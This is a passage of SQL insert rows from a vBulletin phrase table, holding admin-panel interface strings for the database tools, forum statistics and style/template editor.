(37586, -1, 'php_backup_warning', 'sql', 'Database backup via PHP is only recommended for those with small databases as timeouts may occur. Saving to the server or backup via command line is more reliable.', 'vbulletin', '', 0, ''),
(37587, -1, 'query', 'sql', 'Query', 'vbulletin', '', 0, ''),
(37588, -1, 'query_may_modify_database', 'sql', 'This query may modify data in your database. If this change is done in error, it is possible that you will not be able to recover from this change. Are you sure you wish to continue?', 'vbulletin', '', 0, ''),
(37589, -1, 'quote_character', 'sql', 'Quote Character', 'vbulletin', '', 0, ''),
(37590, -1, 'receive_admin_emails', 'sql', 'Receive Admin Emails', 'vbulletin', '', 0, ''),
(37591, -1, 'receive_private_messages', 'sql', 'Receive Private Messages', 'vbulletin', '', 0, ''),
(37592, -1, 'repair_optimize_tables', 'sql', 'Repair / Optimize Tables', 'vbulletin', '', 0, ''),
(37593, -1, 'repair_tables', 'sql', 'Repair Tables', 'vbulletin', '', 0, ''),
(37594, -1, 'replacing_unique_index_on_table_x', 'sql', 'Replacing unique index on table {1}', 'vbulletin', '', 0, ''),
(37595, -1, 'results_to_show_per_page', 'sql', 'Results to Show Per Page', 'vbulletin', '', 0, ''),
(37596, -1, 'results_x_y', 'sql', 'Results: {1} ({2}s)', 'vbulletin', '', 0, ''),
(37597, -1, 'send_notification_email_when_a_private_message_is_received', 'sql', 'Send Notification Email When a Private Message is Received', 'vbulletin', '', 0, ''),
(37598, -1, 'separator_character', 'sql', 'Separator Character', 'vbulletin', '', 0, ''),
(37599, -1, 'show_enhanced_editor_toolbar', 'sql', 'Show Enhanced (WYSIWYG) Editor Toolbar', 'vbulletin', '', 0, ''),
(37600, -1, 'show_standard_editor_toolbar', 'sql', 'Show Standard Editor Toolbar', 'vbulletin', '', 0, ''),
(37601, -1, 'table_name', 'sql', 'Table Name', 'vbulletin', '', 0, ''),
(37602, -1, 'table_x_has_unique_index', 'sql', 'Table {1} already has a unique index', 'vbulletin', '', 0, ''),
(37603, -1, 'this_table_does_not_support_repair_optimize', 'sql', 'This Table Does Not Support Repair / Optimize', 'vbulletin', '', 0, ''),
(37604, -1, 'thread_display_mode', 'sql', 'Thread Display Mode', 'vbulletin', '', 0, ''),
(37605, -1, 'you_are_running_mysql_version_x_convert_to_myisam', 'sql', 'You are running MySQL version {1} which supports a new table format called MyISAM . \r\n \r\nThe ISAM format does not support repair/optimize so you will need to convert tables to MyISAM before they can be repaired/optimized. \r\n \r\nThe following tables are using the obsolete ISAM format.', 'vbulletin', '', 0, ''),
(37606, -1, 'date_ascending', 'stats', 'Date Ascending', 'vbulletin', '', 0, ''),
(37607, -1, 'date_descending', 'stats', 'Date Descending', 'vbulletin', '', 0, ''),
(37608, -1, 'include_empty_results', 'stats', 'Include empty results', 'vbulletin', '', 0, ''),
(37609, -1, 'most_popular_forum', 'stats', 'Most popular forum', 'vbulletin', '', 0, ''),
(37610, -1, 'most_replied_thread', 'stats', 'Most replied to thread', 'vbulletin', '', 0, ''),
(37611, -1, 'most_viewed_thread', 'stats', 'Most viewed thread', 'vbulletin', '', 0, ''),
(37612, -1, 'new_post_statistics', 'stats', 'New Post Statistics', 'vbulletin', '', 0, ''),
(37613, -1, 'new_thread_statistics', 'stats', 'New Thread Statistics', 'vbulletin', '', 0, ''),
(37614, -1, 'newest_member', 'stats', 'Newest member to the forums', 'vbulletin', '', 0, ''),
(37615, -1, 'record_online_users', 'stats', 'Record online users', 'vbulletin', '', 0, ''),
(37616, -1, 'registration_statistics', 'stats', 'Registration Statistics', 'vbulletin', '', 0, ''),
(37617, -1, 'scope', 'stats', 'Scope', 'vbulletin', '', 0, ''),
(37618, -1, 'start_date_after_end', 'stats', 'Start date is after the end date', 'vbulletin', '', 0, ''),
(37619, -1, 'top_poster', 'stats', 'Top poster', 'vbulletin', '', 0, ''),
(37620, -1, 'top_statistics', 'stats', 'Top Statistics', 'vbulletin', '', 0, ''),
(37621, -1, 'total_ascending', 'stats', 'Total Ascending', 'vbulletin', '', 0, ''),
(37622, -1, 'total_descending', 'stats', 'Total Descending', 'vbulletin', '', 0, ''),
(37623, -1, 'user_activity_statistics', 'stats', 'User Activity Statistics', 'vbulletin', '', 0, ''),
(37624, -1, 'weekly', 'stats', 'Weekly', 'vbulletin', '', 0, ''),
(37625, -1, '0_matches_found', 'style', '0 Matches Found', 'vbulletin', '', 0, ''),
(37626, -1, 'add_child_style', 'style', 'Add Child Style', 'vbulletin', '', 0, ''),
(37627, -1, 'add_new_replacement_variable', 'style', 'Add New Replacement Variable', 'vbulletin', '', 0, ''),
(37628, -1, 'add_new_style', 'style', 'Add New Style', 'vbulletin', '', 0, ''),
(37629, -1, 'add_new_template', 'style', 'Add New Template', 'vbulletin', '', 0, ''),
(37630, -1, 'additional_css', 'style', 'Additional CSS Definitions', 'vbulletin', '', 0, ''),
(37631, -1, 'additional_css_description', 'style', 'Advanced Users: If you would like to add any additional CSS for use in your custom templates, any text entered here will be included at the end of the <style> tag ', 'vbulletin', '', 0, ''),
(37632, -1, 'additional_functions', 'style', 'Additional Functions', 'vbulletin', '', 0, ''),
(37633, -1, 'adsense_advertising_intro', 'style', 'This screen will allow you to quickly roll-out Google AdSense advertising units into your vBulletin forum advertising templates, based on your Google AdSense account settings defined in the members\' area at vBulletin.com. \r\n \r\nThere are two different advertising options available, Low and High, and an option to control the type of ad that is displayed. Please choose the option that you would prefer for your community. \r\n \r\nPlease note that utilizing Google AdSense code within your site or community is subject to the Google AdSense terms and conditions . \r\n \r\nTo further configure your Google AdSense account, please visit the Google AdSense website.', 'vbulletin', 'vBulletin Solutions', 1231169488, '3.8.0 Beta 4'),
(37634, -1, 'adsense_deployment_high', 'style', 'You are running the \"High\" package of Google AdSense ads on your forum.', 'vbulletin', 'vBulletin Solutions', 1228482454, '3.8.0 Beta 4'),
(37635, -1, 'adsense_deployment_low', 'style', 'You are running the \"Low\" package of Google AdSense ads on your forum.', 'vbulletin', 'vBulletin Solutions', 1228482465, '3.8.0 Beta 4'),
(37636, -1, 'adsense_deployment_none', 'style', 'You are not running any Google AdSense ads on your forum.', 'vbulletin', 'vBulletin Solutions', 1228481482, '3.8.0 Beta 4'),
(37637, -1, 'align_center', 'style', 'Align Center', 'vbulletin', '', 0, ''),
(37638, -1, 'align_left', 'style', 'Align Left', 'vbulletin', '', 0, ''),
(37639, -1, 'align_right', 'style', 'Align Right', 'vbulletin', '', 0, ''),
(37640, -1, 'alignment', 'style', 'Alignment', 'vbulletin', '', 0, ''),
(37641, -1, 'all_style_options', 'style', 'All Style Options', 'vbulletin', '', 0, ''),
(37642, -1, 'all_template_groups', 'style', 'All Template Groups', 'vbulletin', '', 0, ''),
(37643, -1, 'are_you_sure_want_to_delete_replacement_variable_x', 'style', 'Are you sure you want to delete the replacement variable called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(37644, -1, 'are_you_sure_want_to_delete_style_x', 'style', 'Are you sure you want to delete the style called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(37645, -1, 'are_you_sure_want_to_revert_template_x', 'style', 'Are you sure you want to revert the template called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(37646, -1, 'attachment_icons_folder', 'style', 'Attachment Icons Folder\r\nThis folder contains the various icons used to represent different attachment file types such as txt, jpg, zip etc. ', 'vbulletin', '', 0, ''),
(37647, -1, 'attachment_is_visible', 'style', 'Attachment is Visible', 'vbulletin', '', 0, ''),
(37648, -1, 'available_fonts', 'style', 'Available Fonts', 'vbulletin', '', 0, ''),
(37649, -1, 'available_sizes', 'style', 'Available Sizes', 'vbulletin', '', 0, ''),
(37650, -1, 'background', 'style', 'Background', 'vbulletin', '', 0, ''),
(37651, -1, 'bbcode_pulldown_menu_desc', 'style', 'Here you can specify the fonts and sizes available in the pull down menus for the BB code toolbar. Separate each entry with a new-line.', 'vbulletin', 'vBulletin Solutions', 1206964197, '3.7.0 Release Candidate 2'),
(37652, -1, 'body', 'style', 'Body', 'vbulletin', '', 0, ''),
(37653, -1, 'body_desc', 'style', '\'Body\' is used to control the color of the outer page border, and to set the basic parameters for all text and links on all pages.', 'vbulletin', '', 0, ''),
(37654, -1, 'border', 'style', 'Border', 'vbulletin', '', 0, ''),
(37655, -1, 'buttons', 'style', 'Buttons', 'vbulletin', '', 0, ''),
(37656, -1, 'buttons_desc', 'style', '\'Buttons\' is used to style form buttons such as submit and reset, along with any other <input type="button" ... /> elements.', 'vbulletin', '', 0, ''),
(37657, -1, 'buttons_folder', 'style', 'Button Images Folder\r\nThis is the folder containing all the button images for this style. The location of this folder can be overridden by a language setting. ', 'vbulletin', '', 0, ''),
(37658, -1, 'case_insensitive', 'style', 'Case-Insensitive', 'vbulletin', '', 0, ''),
(37659, -1, 'category_strips', 'style', 'Category Strips', 'vbulletin', '', 0, ''),
(37660, -1, 'category_strips_desc', 'style', '\'Category Strips\' also has a double purpose. It is used to indicate a \'Category\' (no-posting) forum, and it is also used as the style for the main title bar of most tables.', 'vbulletin', '', 0, ''),
(37661, -1, 'change_google_adsense_package', 'style', 'Change Google AdSense Package', 'vbulletin', 'vBulletin Solutions', 1228482162, '3.8.0 Beta 4'),
(37662, -1, 'click_the_expand_collapse_button', 'style', 'Click the \'Expand/Collapse\' button, or double-click the group name to expand or collapse the {1} group of templates.', 'vbulletin', '', 0, ''),
(37663, -1, 'closed_thread_image', 'style', 'Closed Thread Image', 'vbulletin', '', 0, ''),
(37664, -1, 'code_block_width', 'style', 'Code Block Width (pixels)\r\n(This value controls the width of [code], [php] and [html] BB code blocks. You may set this value to \'auto\', but if you do, Internet Explorer will stretch the width of the block rather than inserting a scrollbar.) ', 'vbulletin', 'vBulletin Solutions', 1206965599, '3.7.0 Release Candidate 2'),
(37665, -1, 'collapse_all_template_groups', 'style', 'Collapse All Template Groups', 'vbulletin', '', 0, ''),
(37666, -1, 'collapse_template_group', 'style', 'Collapse Template Group', 'vbulletin', '', 0, ''),
(37667, -1, 'collapse_templates', 'style', 'Collapse Templates', 'vbulletin', '', 0, ''),
(37668, -1, 'collapse_x', 'style', 'Collapse {1}', 'vbulletin', '', 0, ''),
(37669, -1, 'color_picker_not_ready', 'style', 'The color picker is still loading, please wait.', 'vbulletin', '', 0, ''),
(37670, -1, 'comment', 'style', 'Comment', 'vbulletin', '', 0, ''),
(37671, -1, 'common_templates', 'style', 'Common Templates', 'vbulletin', '', 0, ''),
(37672, -1, 'compare_versions', 'style', 'Compare Versions', 'vbulletin', '', 0, ''),
(37673, -1, 'comparing_versions_of_x', 'style', 'Comparing Versions of {1} ', 'vbulletin', '', 0, ''),
(37674, -1, 'comparison_key', 'style', 'Comparison Key', 'vbulletin', '', 0, ''),
(37675, -1, 'confirm_removal_of_copyright_notice', 'style', 'Confirm Removal of vBulletin Copyright Notice', 'vbulletin', '', 0, ''),
(37676, -1, 'content', 'style', 'Content', 'vbulletin', 'vBulletin Solutions', 1220882473, '3.8.0 Alpha 1'),
(37677, -1, 'copy', 'style', 'Copy', 'vbulletin', '', 0, ''),
(37678, -1, 'create_new_style', 'style', 'Create New Style', 'vbulletin', '', 0, ''),
(37679, -1, 'creating_a_new_style_called_x', 'style', 'Creating a new Style called \'{1} \'', 'vbulletin', '', 0, ''),
(37680, -1, 'css', 'style', 'CSS', 'vbulletin', '', 0, ''),
(37681, -1, 'css_selector_x', 'style', 'CSS Selector: {1}', 'vbulletin', '', 0, ''),
(37682, -1, 'css_value_invalid', 'style', 'Error: {1} is not a valid value for a CSS entry.', 'vbulletin', '', 0, ''),
(37683, -1, 'current_default', 'style', 'Current Default', 'vbulletin', '', 0, ''),
(37684, -1, 'current_version', 'style', 'Current Version', 'vbulletin', '', 0, ''),
(37685, -1, 'custom_templates', 'style', 'Custom Templates', 'vbulletin', '', 0, ''),
(37686, -1, 'customize', 'style', 'Customize', 'vbulletin', '', 0, ''),
(37687, -1, 'customize_further', 'style', 'Customize Further', 'vbulletin', '', 0, ''),
(37688, -1, 'customize_replacement_variable_x', 'style', 'Customize Replacement Variable: {1} ', 'vbulletin', '', 0, ''),
(37689, -1, 'customize_template_x', 'style', 'Customize Template: {1} ', 'vbulletin', '', 0, ''),
(37690, -1, 'customized_in_a_parent_style_x', 'style', 'Customized in a Parent Style ', 'vbulletin', '', 0, ''),
(37691, -1, 'customized_in_this_style', 'style', 'Customized in this Style', 'vbulletin', '', 0, ''),
(37692, -1, 'default_template_updated_desc', 'style', 'Default Template Updated in {1} by {2} Your Custom Template Last Edited in {3} by {4} ', 'vbulletin', '', 0, ''),
(37693, -1, 'delete_style', 'style', 'Delete Style', 'vbulletin', '', 0, ''),
(37694, -1, 'depth_x_items', 'style', 'Depth {1} Items', 'vbulletin', '', 0, ''),
(37695, -1, 'disable_wrapping', 'style', 'Disable Wrapping', 'vbulletin', '', 0, ''),
(37696, -1, 'edit_fonts_colors_etc', 'style', 'Edit Fonts / Colors etc.', 'vbulletin', '', 0, ''),
(37697, -1, 'edit_settings', 'style', 'Edit Settings', 'vbulletin', '', 0, ''),
(37698, -1, 'edit_style_options', 'style', 'Edit Style Options', 'vbulletin', '', 0, ''),
(37699, -1, 'edit_styles', 'style', 'Edit Styles', 'vbulletin', '', 0, ''),
(37700, -1, 'edit_template', 'style', 'Edit Template', 'vbulletin', '', 0, ''),
(37701, -1, 'edit_templates', 'style', 'Edit Templates', 'vbulletin', '', 0, ''),
(37702, -1, 'editor_styles_button_down', 'style', 'Editor buttons in clicked state', 'vbulletin', '', 0, ''),
(37703, -1, 'editor_styles_button_hover', 'style', 'Editor buttons in hover state', 'vbulletin', '', 0, ''),
(37704, -1, 'editor_styles_button_normal', 'style', 'Editor buttons in normal state', 'vbulletin', '', 0, ''),
(37705, -1, 'editor_styles_button_selected', 'style', 'Editor buttons in selected state', 'vbulletin', '', 0, ''),
(37706, -1, 'editor_styles_menu_down', 'style', 'Editor menu items in clicked state (WYSIWYG only)', 'vbulletin', '', 0, ''),
(37707, -1, 'editor_styles_menu_hover', 'style', 'Editor menu items in hover state (WYSIWYG only)', 'vbulletin', '', 0, ''),
(37708, -1, 'editor_styles_menu_normal', 'style', 'Editor menu items in normal state (WYSIWYG only)', 'vbulletin', '', 0, ''),
(37709, -1, 'editor_styles_popup_down', 'style', 'Editor popup controls in clicked state (WYSIWYG only)', 'vbulletin', '', 0, ''),
(37710, -1, 'enable_wrapping', 'style', 'Enable Wrapping', 'vbulletin', '', 0, ''),
(37711, -1, 'entry_has_a_comment', 'style', '* - Entry has a comment. Hover over the type to view it.', 'vbulletin', '', 0, ''),
(37712, -1, 'expand_all_template_groups', 'style', 'Expand All Template Groups', 'vbulletin', '', 0, ''),
(37713, -1, 'expand_template_group', 'style', 'Expand Template Group', 'vbulletin', '', 0, ''),
(37714, -1, 'expand_templates', 'style', 'Expand Templates', 'vbulletin', '', 0, ''),
(37715, -1, 'expand_x', 'style', 'Expand {1}', 'vbulletin', '', 0, ''),
(37716, -1, 'extra_css', 'style', 'Extra CSS Attributes', 'vbulletin', '', 0, ''),
(37717, -1, 'file_inclusion_not_permitted', 'style', 'File inclusion is not permitted in template conditional expressions. Please go back and re-write this expression.', 'vbulletin', 'vBulletin Solutions', 1152791484, '3.6.0 Release Candidate 2'),
(37718, -1, 'find_and_replace_in_templates', 'style', 'Find and Replace in Templates (be careful!)', 'vbulletin', '', 0, ''),
(37719, -1, 'first_alternating_color', 'style', 'First Alternating Color', 'vbulletin', '', 0, ''),
(37720, -1, 'first_alternating_color_desc', 'style', 'Most table cells in vBulletin use either the First or Second alternating color as their background. Set the attributes for elements using \'First Alternating Color\' here.', 'vbulletin', '', 0, ''),
(37721, -1, 'following_options_apply_only_if_new_style', 'style', 'The following options apply only if you are creating a new style, rather than overwriting an existing style', 'vbulletin', '', 0, ''),
(37722, -1, 'font_color', 'style', 'Font Color', 'vbulletin', '', 0, ''),
(37723, -1, 'font_family', 'style', 'Font Family', 'vbulletin', '', 0, ''),
(37724, -1, 'font_size', 'style', 'Font Size', 'vbulletin', '', 0, ''),
(37725, -1, 'font_style', 'style', 'Font Style', 'vbulletin', '', 0, ''),
(37726, -1, 'fonts_colors_etc', 'style', 'Fonts / Colors etc.', 'vbulletin', '', 0, ''),
(37727, -1, 'form_spacer_size', 'style', 'Form Element Spacer Size (pixels) (This is the size of the spacer used to separate blocks of form elements) ', 'vbulletin', '', 0, ''),
(37728, -1, 'form_width', 'style', 'Form Width (pixels) (This value specifies the width in pixels of most forms in the vBulletin interface) ', 'vbulletin', '', 0, ''),
(37729, -1, 'form_width_usercp', 'style', 'User Control Panel Form Width (pixels) (This value allows you to specify a smaller form width, to compensate for the presence of the navigation bar in the user control panel pages) ', 'vbulletin', '', 0, ''),
(37730, -1, 'forum_jump_menu', 'style', 'Forum Jump Menu', 'vbulletin', '', 0, ''),
(37731, -1, 'function_name', 'style', 'Function Name', 'vbulletin', '', 0, ''),
(37732, -1, 'get_customizations_from_parent_styles', 'style', 'Get customizations made in this style and all parent styles ', 'vbulletin', '', 0, ''),
(37733, -1, 'get_customizations_from_this_style_only', 'style', 'Get customizations made only in this style ', 'vbulletin', '', 0, ''),
(37734, -1, 'global_templates', 'style', 'Global Templates', 'vbulletin', '', 0, ''),
(37735, -1, 'google_adsense_advertising', 'style', 'Google AdSense Advertising', 'vbulletin', 'vBulletin Solutions', 1228479600, '3.8.0 Beta 4'),
(37736, -1, 'google_adsense_package_high', 'style', 'High - one medium advertisting unit under the navbar, one unit before the footer, and one unit for guests in the first post of a thread', 'vbulletin', 'vBulletin Solutions', 1231169544, '3.8.0 Beta 4'),
(37737, -1, 'google_adsense_package_low', 'style', 'Low - one small text-only advertising unit under the navbar and one small unit in the footer', 'vbulletin', 'vBulletin Solutions', 1231169573, '3.8.0 Beta 4'),
(37738, -1, 'google_adsense_publisher_id', 'style', 'Google AdSense Publisher ID', 'vbulletin', 'vBulletin Solutions', 1228482301, '3.8.0 Beta 4'),
(37739, -1, 'group_ad_location', 'style', 'Ad Location', 'vbulletin', 'vBulletin Solutions', 1192724883, '3.7.0 Beta 1'),
(37740, -1, 'group_album', 'style', 'Album', 'vbulletin', 'vBulletin Solutions', 1193226581, '3.7.0 Beta 1'),
(37741, -1, 'group_attachment_list', 'style', 'Attachment List', 'vbulletin', '', 0, ''),
(37742, -1, 'group_bb_code_layout', 'style', 'BB Code Layout', 'vbulletin', '', 0, ''),
(37743, -1, 'group_buddy_list', 'style', 'Buddy (Contact) List', 'vbulletin', 'vBulletin Solutions', 1196765388, '3.7.0 Beta 1'),
(37744, -1, 'group_calendar', 'style', 'Calendar', 'vbulletin', '', 0, ''),
(37745, -1, 'group_editor', 'style', 'Editor', 'vbulletin', '', 0, ''),
(37746, -1, 'group_faq', 'style', 'FAQ', 'vbulletin', '', 0, ''),
(37747, -1, 'group_forum_display', 'style', 'Forum Display', 'vbulletin', '', 0, ''),
(37748, -1, 'group_forum_home', 'style', 'Forum Home', 'vbulletin', '', 0, ''),
(37749, -1, 'group_help', 'style', 'Help', 'vbulletin', '', 0, ''),
(37750, -1, 'group_human_verification', 'style', 'Human Verification', 'vbulletin', 'vBulletin Solutions', 1192229357, '3.7.0 Beta 1'),
(37751, -1, 'group_instant_messaging', 'style', 'Instant Messaging', 'vbulletin', '', 0, ''),
(37752, -1, 'group_member_info', 'style', 'Member Info', 'vbulletin', '', 0, ''),
(37753, -1, 'group_members_list', 'style', 'Member\'s List', 'vbulletin', '', 0, ''),
(37754, -1, 'group_moderation', 'style', 'Moderation', 'vbulletin', 'vBulletin Solutions', 1142610251, '3.6.0 Beta 1'),
(37755, -1, 'group_modify_user_option', 'style', 'Modify User Option', 'vbulletin', '', 0, ''),
(37756, -1, 'group_navigation_breadcrumb', 'style', 'Navigation / Breadcrumb', 'vbulletin', '', 0, ''),
(37757, -1, 'group_new_posting', 'style', 'New Posting', 'vbulletin', '', 0, ''),
(37758, -1, 'group_page_navigation', 'style', 'Page Navigation', 'vbulletin', '', 0, ''),
(37759, -1, 'group_paid_subscriptions', 'style', 'Subscriptions (Paid)', 'vbulletin', 'vBulletin Solutions', 1195666615, '3.7.0 Beta 1'),
(37760, -1, 'group_picture_comment', 'style', 'Picture Comment', 'vbulletin', 'vBulletin Solutions', 1200079906, '3.7.0 Beta 4'),
(37761, -1, 'group_poll', 'style', 'Poll', 'vbulletin', '', 0, ''),
(37762, -1, 'group_post_icon', 'style', 'Post Icon', 'vbulletin', '', 0, ''),
(37763, -1, 'group_postbit', 'style', 'Postbit', 'vbulletin', '', 0, ''),
(37764, -1, 'group_posthistory', 'style', 'Post Edit History', 'vbulletin', 'vBulletin Solutions', 1191498135, '3.7.0 Beta 1'),
(37765, -1, 'group_printable_thread', 'style', 'Printable Thread', 'vbulletin', '', 0, ''),
(37766, -1, 'group_private_message', 'style', 'Private Message', 'vbulletin', '', 0, ''),
(37767, -1, 'group_registration', 'style', 'Registration', 'vbulletin', '', 0, ''),
(37768, -1, 'group_search', 'style', 'Search', 'vbulletin', '', 0, ''),
(37769, -1, 'group_show_groups', 'style', 'Show Groups', 'vbulletin', '', 0, ''),
(37770, -1, 'group_show_thread', 'style', 'Show Thread', 'vbulletin', '', 0, ''),
(37771, -1, 'group_smilie_popup', 'style', 'Smilie Popup', 'vbulletin', '', 0, ''),
(37772, -1, 'group_socialgroups', 'style', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1192447616, '3.7.0 Beta 1'),
(37773, -1, 'group_subscribed_thread', 'style', 'Subscriptions (Thread Notifications)', 'vbulletin', 'vBulletin Solutions', 1195666672, '3.7.0 Beta 1'),
(37774, -1, 'group_thread_administration', 'style', 'Thread Administration', 'vbulletin', '', 0, ''),
(37775, -1, 'group_threadbit', 'style', 'Threadbit', 'vbulletin', '', 0, ''),
(37776, -1, 'group_user_control_panel', 'style', 'User Control Panel', 'vbulletin', '', 0, ''),
(37777, -1, 'group_user_infraction', 'style', 'User Infraction', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(37778, -1, 'group_user_note', 'style', 'User Note', 'vbulletin', '', 0, ''),
(37779, -1, 'group_user_profile_field', 'style', 'User Profile Field', 'vbulletin', '', 0, ''),
(37780, -1, 'group_user_reputation', 'style', 'Reputation (User Reputation)', 'vbulletin', 'vBulletin Solutions', 1195666534, '3.7.0 Beta 1'),
(37781, -1, 'group_visitor_message', 'style', 'Visitor Message', 'vbulletin', 'vBulletin Solutions', 1197309198, '3.7.0 Beta 1'),
(37782, -1, 'group_who_posted', 'style', 'Who Posted?', 'vbulletin', '', 0, ''),
(37783, -1, 'group_whos_online', 'style', 'Who\'s Online', 'vbulletin', '', 0, ''),
(37784, -1, 'highlighted_font', 'style', 'Highlighted Font', 'vbulletin', '', 0, ''),
(37785, -1, 'highlighted_font_desc', 'style', '\'Highlighted Font\' is used primarily to highlight search words in search results, but is used occasionally elsewhere too.', 'vbulletin', '', 0, ''),
(37786, -1, 'historical', 'style', 'Historical', 'vbulletin', '', 0, ''),
(37787, -1, 'history_of_template_x', 'style', 'History of Template {1} ', 'vbulletin', '', 0, ''),
(37788, -1, 'hover_link', 'style', 'Hover', 'vbulletin', '', 0, ''),
(37789, -1, 'html_doctype', 'style', 'HTML Doctype', 'vbulletin', '', 0, ''),
(37790, -1, 'ignore_style_version', 'style', 'Ignore Style Version Use style file even if it was created by a different version of vBulletin? ', 'vbulletin', '', 0, ''),
(37791, -1, 'image_paths', 'style', 'Image Paths', 'vbulletin', '', 0, ''),
(37792, -1, 'images_folder', 'style', 'Images Folder', 'vbulletin', '', 0, ''),
(37793, -1, 'import_style_xml_file', 'style', 'Import Style XML File', 'vbulletin', '', 0, ''),
(37794, -1, 'importing_style', 'style', 'Importing Style', 'vbulletin', '', 0, ''),
(37795, -1, 'including_master_style', 'style', 'Including MASTER STYLE', 'vbulletin', '', 0, ''),
(37796, -1, 'inherit', 'style', 'Inherit', 'vbulletin', '', 0, ''),
(37797, -1, 'inline_mod_highlight', 'style', 'Inline Moderation Element Highlight', 'vbulletin', '', 0, ''),
(37798, -1, 'inline_mod_highlight_desc', 'style', 'When an inline moderation checkbox is clicked, the corresponding item will be styled with this class.', 'vbulletin', '', 0, ''),
(37799, -1, 'inner_border_width', 'style', 'Inner Border Width (pixels) (This value specifies the width in pixels of the inner-border of all colored tables) ', 'vbulletin', '', 0, ''),
(37800, -1, 'inner_table_width', 'style', 'Inner Table Width (pixels or percentage) (This is the width given to every table within your vBulletin pages) ', 'vbulletin', '', 0, ''),
(37801, -1, 'input_fields', 'style', 'Input Fields', 'vbulletin', '', 0, ''),
(37802, -1, 'input_fields_desc', 'style', '\'Input Fields\' is used to style single and multi-line text boxes in forms.', 'vbulletin', '', 0, ''),
(37803, -1, 'internet_explorer_4', 'style', 'Internet Explorer 4+', 'vbulletin', '', 0, ''),
(37804, -1, 'it_appears_you_are_removing_vbulletin_copyright', 'style', 'It appears that you may be removing the vBulletin copyright notice from this template. If this is the case, please be aware that this may be a violation of the license agreement. Continue only if you are sure that you will not be violating the license.', 'vbulletin', '', 0, ''),
(37805, -1, 'justified', 'style', 'Justified', 'vbulletin', '', 0, ''),
(37806, -1, 'last_modified', 'style', 'Last Modified', 'vbulletin', '', 0, ''),
(37807, -1, 'legend_desc', 'style', 'Use this setting to set the style of the <legend> text that appears in the border of <frameset> tags in forms.', 'vbulletin', '', 0, ''),
(37808, -1, 'lines_around_each_diff', 'style', 'lines around each diff', 'vbulletin', 'vBulletin Solutions', 1220883493, '3.8.0 Alpha 1'),
(37809, -1, 'main_css', 'style', 'Main CSS', 'vbulletin', '', 0, ''),
(37810, -1, 'main_table_width', 'style', 'Main Table Width (pixels or percentage) (This is the width of the table that contains all your vBulletin content) ', 'vbulletin', '', 0, ''),
(37811, -1, 'master_style', 'style', 'MASTER STYLE', 'vbulletin', '', 0, ''),
(37812, -1, 'menus', 'style', ' Menus', 'vbulletin', '', 0, ''),
(37813, -1, 'menus_desc', 'style', 'All <select> elements will be styled with this control.', 'vbulletin', '', 0, ''),
(37814, -1, 'message_width', 'style', 'Message Area Width (pixels) (This value allows you to specify the width in pixels of the text box used for all message posting in vBulletin) ', 'vbulletin', '', 0, ''),
(37815, -1, 'message_width_usercp', 'style', 'User Control Panel Message Area Width (pixels) (This value represents the width in pixels of the message area in user control panel pages) ', 'vbulletin', '', 0, ''),
(37816, -1, 'misc_images_folder', 'style', 'Miscellaneous Images Folder\r\nThis folder contains the various images that do not fit into other category. ', 'vbulletin', '', 0, ''),
(37817, -1, 'navbar_text', 'style', 'Navbar Text', 'vbulletin', '', 0, ''),
(37818, -1, 'navbar_text_desc', 'style', 'This group of settings controls the style of the navigation bread-crumb in the Navbar.', 'vbulletin', '', 0, ''),
(37819, -1, 'netscape_4', 'style', 'Netscape Navigator 4.x', 'vbulletin', '', 0, ''),
(37820, -1, 'netscape_6', 'style', 'Netscape Navigator 6.x / Mozilla 1.x', 'vbulletin', '', 0, ''),
(37821, -1, 'new_line', 'style', 'New Line', 'vbulletin', 'vBulletin Solutions', 1220882455, '3.8.0 Alpha 1'),
(37822, -1, 'new_reply_image', 'style', 'New Reply Image', 'vbulletin', '', 0, ''),
(37823, -1, 'new_thread_image', 'style', 'New Thread Image', 'vbulletin', '', 0, ''),
(37824, -1, 'new_version', 'style', 'New Version', 'vbulletin', '', 0, ''),
(37825, -1, 'no_google_adsense_ads', 'style', 'No Google AdSense Ads ', 'vbulletin', 'vBulletin Solutions', 1228481731, '3.8.0 Beta 4'),
(37826, -1, 'no_parent_style', 'style', 'No Parent Style', 'vbulletin', '', 0, ''),
(37827, -1, 'no_replacements_defined', 'style', 'No replacement variables are defined for this style', 'vbulletin', '', 0, ''),
(37828, -1, 'no_styles_needed_updating', 'style', 'No styles needed updating', 'vbulletin', '', 0, ''),
(37829, -1, 'normal_link', 'style', 'Normal', 'vbulletin', '', 0, ''),
(37830, -1, 'not_found', 'style', 'Not Found', 'vbulletin', '', 0, ''),
(37831, -1, 'notes_for_using_regex_in_find_replace', 'style', 'Notes for Using Regular Expressions with Find and Replace', 'vbulletin', '', 0, ''),
(37832, -1, 'old_default', 'style', 'Old Default', 'vbulletin', '', 0, ''),
(37833, -1, 'old_line', 'style', 'Old Line', 'vbulletin', 'vBulletin Solutions', 1220882438, '3.8.0 Alpha 1'),
(37834, -1, 'old_template_table_dropped', 'style', 'Old Template Table Dropped', 'vbulletin', '', 0, ''),
(37835, -1, 'old_version', 'style', 'Old Version', 'vbulletin', '', 0, ''),
(37836, -1, 'outer_border_width', 'style', 'Outer Border Width (pixels) (This value specifies the width in pixels of the outer-border of all colored tables) ', 'vbulletin', '', 0, ''),
(37837, -1, 'overwrite_style', 'style', 'Merge Into Style (Selecting a style here will cause the imported style to be merged into an existing style, overwriting any conflicting entries. Leave blank to create a new style) ', 'vbulletin', '', 0, ''),
(37838, -1, 'overwriting_style_x', 'style', 'Overwriting Style \'{1} \'', 'vbulletin', '', 0, ''),
(37839, -1, 'padding', 'style', 'Padding', 'vbulletin', '', 0, ''),
(37840, -1, 'page_background', 'style', 'Page Background', 'vbulletin', '', 0, ''),
(37841, -1, 'page_background_desc', 'style', '\'Page Background\' is used primarily to set the background and text colors of the inner-page area.', 'vbulletin', '', 0, ''),
(37842, -1, 'panel', 'style', 'Panel (Forms)', 'vbulletin', '', 0, ''),
(37843, -1, 'panel_desc', 'style', '\'Panel\' is used to create a panel in which most form elements are displayed.', 'vbulletin', '', 0, ''),
(37844, -1, 'panel_surround', 'style', 'Panel Surround', 'vbulletin', '', 0, ''),
